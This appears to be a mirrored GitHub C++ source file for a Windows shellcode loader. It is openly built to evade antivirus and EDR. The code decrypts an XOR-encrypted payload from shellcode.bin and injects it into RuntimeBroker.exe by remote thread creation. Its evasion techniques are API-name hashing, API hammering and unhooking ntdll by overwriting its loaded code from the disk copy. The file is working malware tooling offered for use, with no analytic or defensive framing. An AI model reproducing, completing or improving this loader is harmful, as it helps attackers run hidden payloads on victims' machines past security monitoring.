mirror of
https://github.com/Answerr/shellcode_loader_bypass.git
synced 2026-02-05 08:09:42 +08:00
263 lines
8.1 KiB
C++
263 lines
8.1 KiB
C++
#include <windows.h>
|
|
#include <tlhelp32.h>
|
|
#include <vector>
|
|
#include <fstream>
|
|
#include <iterator>
|
|
#include <winternl.h>
|
|
#include <threadpoolapiset.h>
|
|
#include <unordered_map>
|
|
#include <string>
|
|
|
|
#pragma comment(lib, "ntdll.lib")
|
|
|
|
std::unordered_map<DWORD, FARPROC> apiHashTable;
|
|
|
|
DWORD HashString(const char* str) {
|
|
DWORD hash = 0;
|
|
while (*str) {
|
|
hash = ((hash << 5) + hash) + *str++;
|
|
}
|
|
return hash;
|
|
}
|
|
|
|
FARPROC ResolveAPI(DWORD hash) {
|
|
if (apiHashTable.find(hash) != apiHashTable.end()) {
|
|
return apiHashTable[hash];
|
|
}
|
|
|
|
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
|
|
if (!hNtdll) return nullptr;
|
|
|
|
auto pExportDir = reinterpret_cast<PIMAGE_EXPORT_DIRECTORY>(
|
|
reinterpret_cast<BYTE*>(hNtdll) +
|
|
reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(hNtdll) +
|
|
reinterpret_cast<PIMAGE_DOS_HEADER>(hNtdll)->e_lfanew)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
|
|
|
|
auto pNames = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNames);
|
|
auto pFunctions = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfFunctions);
|
|
auto pOrdinals = reinterpret_cast<WORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNameOrdinals);
|
|
|
|
for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
|
|
const char* apiName = reinterpret_cast<const char*>(reinterpret_cast<BYTE*>(hNtdll) + pNames[i]);
|
|
DWORD apiHash = HashString(apiName);
|
|
|
|
if (apiHash == hash) {
|
|
auto proc = reinterpret_cast<FARPROC>(reinterpret_cast<BYTE*>(hNtdll) + pFunctions[pOrdinals[i]]);
|
|
apiHashTable[hash] = proc;
|
|
return proc;
|
|
}
|
|
}
|
|
return nullptr;
|
|
}
|
|
|
|
void APIHammering() {
|
|
for (int i = 0; i < 100; i++) {
|
|
LoadLibraryA("kernel32.dll");
|
|
LoadLibraryA("user32.dll");
|
|
GetModuleHandleA("ntdll.dll");
|
|
}
|
|
}
|
|
|
|
void ObfuscateString(std::string& str, unsigned char key) {
|
|
for (auto& c : str) {
|
|
c ^= key;
|
|
}
|
|
}
|
|
|
|
typedef BOOL(WINAPI* LPDSENUMATTRIBUTES)(void* lpShellcode);
|
|
|
|
void DecryptShellcode(std::vector<unsigned char>& shellcode, unsigned char key) {
|
|
for (size_t i = 0; i < shellcode.size(); ++i) {
|
|
shellcode[i] ^= key;
|
|
}
|
|
}
|
|
|
|
void UnhookNtdll() {
|
|
DWORD hashVirtualProtect = HashString("VirtualProtect");
|
|
FARPROC pVirtualProtect = ResolveAPI(hashVirtualProtect);
|
|
|
|
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
|
|
if (!hNtdll) return;
|
|
|
|
wchar_t systemDir[MAX_PATH] = { 0 };
|
|
GetSystemDirectory(systemDir, MAX_PATH);
|
|
|
|
wchar_t ntdllPath[MAX_PATH] = { 0 };
|
|
wcscat_s(ntdllPath, systemDir);
|
|
wcscat_s(ntdllPath, L"\ntdll.dll");
|
|
|
|
HANDLE hFile = CreateFile(ntdllPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
|
|
if (hFile == INVALID_HANDLE_VALUE) return;
|
|
|
|
DWORD fileSize = GetFileSize(hFile, nullptr);
|
|
if (fileSize == INVALID_FILE_SIZE) {
|
|
CloseHandle(hFile);
|
|
return;
|
|
}
|
|
|
|
HANDLE hMapping = CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, fileSize, nullptr);
|
|
if (!hMapping) {
|
|
CloseHandle(hFile);
|
|
return;
|
|
}
|
|
|
|
void* pFileData = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
|
|
if (!pFileData) {
|
|
CloseHandle(hMapping);
|
|
CloseHandle(hFile);
|
|
return;
|
|
}
|
|
|
|
auto pLoadedNtdll = reinterpret_cast<BYTE*>(hNtdll);
|
|
auto pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(pFileData);
|
|
auto pNtHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(pFileData) + pDosHeader->e_lfanew);
|
|
|
|
auto pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders);
|
|
for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++) {
|
|
if (!strcmp(reinterpret_cast<char*>(pSectionHeader->Name), ".text")) {
|
|
DWORD oldProtect;
|
|
reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
|
|
pLoadedNtdll + pSectionHeader->VirtualAddress,
|
|
pSectionHeader->Misc.VirtualSize,
|
|
PAGE_EXECUTE_READWRITE,
|
|
&oldProtect
|
|
);
|
|
|
|
memcpy(
|
|
pLoadedNtdll + pSectionHeader->VirtualAddress,
|
|
reinterpret_cast<BYTE*>(pFileData) + pSectionHeader->PointerToRawData,
|
|
pSectionHeader->SizeOfRawData
|
|
);
|
|
|
|
reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
|
|
pLoadedNtdll + pSectionHeader->VirtualAddress,
|
|
pSectionHeader->Misc.VirtualSize,
|
|
oldProtect,
|
|
&oldProtect
|
|
);
|
|
break;
|
|
}
|
|
}
|
|
|
|
UnmapViewOfFile(pFileData);
|
|
CloseHandle(hMapping);
|
|
CloseHandle(hFile);
|
|
}
|
|
|
|
void ExecuteShellcodeWithThreadpool(const std::vector<unsigned char>& shellcode) {
|
|
void* execMemory = VirtualAlloc(
|
|
nullptr,
|
|
shellcode.size(),
|
|
MEM_COMMIT | MEM_RESERVE,
|
|
PAGE_EXECUTE_READWRITE
|
|
);
|
|
|
|
if (!execMemory) {
|
|
return;
|
|
}
|
|
|
|
memcpy(execMemory, shellcode.data(), shellcode.size());
|
|
|
|
PTP_WORK work = CreateThreadpoolWork(
|
|
[](PTP_CALLBACK_INSTANCE, void* context, PTP_WORK) {
|
|
auto shellcodePtr = reinterpret_cast<void(*)()>(context);
|
|
shellcodePtr();
|
|
},
|
|
execMemory,
|
|
nullptr
|
|
);
|
|
|
|
if (work) {
|
|
SubmitThreadpoolWork(work);
|
|
WaitForThreadpoolWorkCallbacks(work, FALSE);
|
|
CloseThreadpoolWork(work);
|
|
}
|
|
|
|
VirtualFree(execMemory, 0, MEM_RELEASE);
|
|
}
|
|
|
|
DWORD FindProcessId(const wchar_t* processName) {
|
|
PROCESSENTRY32 pe32;
|
|
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
|
if (hSnapshot == INVALID_HANDLE_VALUE) {
|
|
return 0;
|
|
}
|
|
|
|
pe32.dwSize = sizeof(PROCESSENTRY32);
|
|
if (Process32First(hSnapshot, &pe32)) {
|
|
do {
|
|
if (!_wcsicmp(pe32.szExeFile, processName)) {
|
|
CloseHandle(hSnapshot);
|
|
return pe32.th32ProcessID;
|
|
}
|
|
} while (Process32Next(hSnapshot, &pe32));
|
|
}
|
|
|
|
CloseHandle(hSnapshot);
|
|
return 0;
|
|
}
|
|
|
|
void RemoteFunctionStompingInjection(const std::vector<unsigned char>& shellcode) {
|
|
DWORD processId = FindProcessId(L"RuntimeBroker.exe");
|
|
if (processId == 0) {
|
|
return;
|
|
}
|
|
|
|
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);
|
|
if (!hProcess) {
|
|
return;
|
|
}
|
|
|
|
void* remoteMemory = VirtualAllocEx(hProcess, nullptr, shellcode.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
|
|
if (!remoteMemory) {
|
|
CloseHandle(hProcess);
|
|
return;
|
|
}
|
|
|
|
if (!WriteProcessMemory(hProcess, remoteMemory, shellcode.data(), shellcode.size(), nullptr)) {
|
|
VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
|
|
CloseHandle(hProcess);
|
|
return;
|
|
}
|
|
|
|
HMODULE hModule = GetModuleHandleA("kernel32.dll");
|
|
FARPROC loadLibraryAddr = GetProcAddress(hModule, "LoadLibraryA");
|
|
|
|
HANDLE hThread = CreateRemoteThread(hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(remoteMemory), nullptr, 0, nullptr);
|
|
if (hThread) {
|
|
WaitForSingleObject(hThread, INFINITE);
|
|
CloseHandle(hThread);
|
|
}
|
|
|
|
VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
|
|
CloseHandle(hProcess);
|
|
}
|
|
|
|
int main() {
|
|
const char* filename = "shellcode.bin";
|
|
const unsigned char key = 0x5A;
|
|
|
|
APIHammering(); // Add hammering before starting
|
|
UnhookNtdll();
|
|
|
|
std::ifstream file(filename, std::ios::binary);
|
|
if (!file.is_open()) {
|
|
return -1;
|
|
}
|
|
|
|
std::vector<unsigned char> encryptedShellcode(
|
|
(std::istreambuf_iterator<char>(file)),
|
|
std::istreambuf_iterator<char>()
|
|
);
|
|
file.close();
|
|
|
|
if (encryptedShellcode.empty()) {
|
|
return -1;
|
|
}
|
|
|
|
DecryptShellcode(encryptedShellcode, key);
|
|
|
|
RemoteFunctionStompingInjection(encryptedShellcode);
|
|
|
|
return 0;
|
|
} |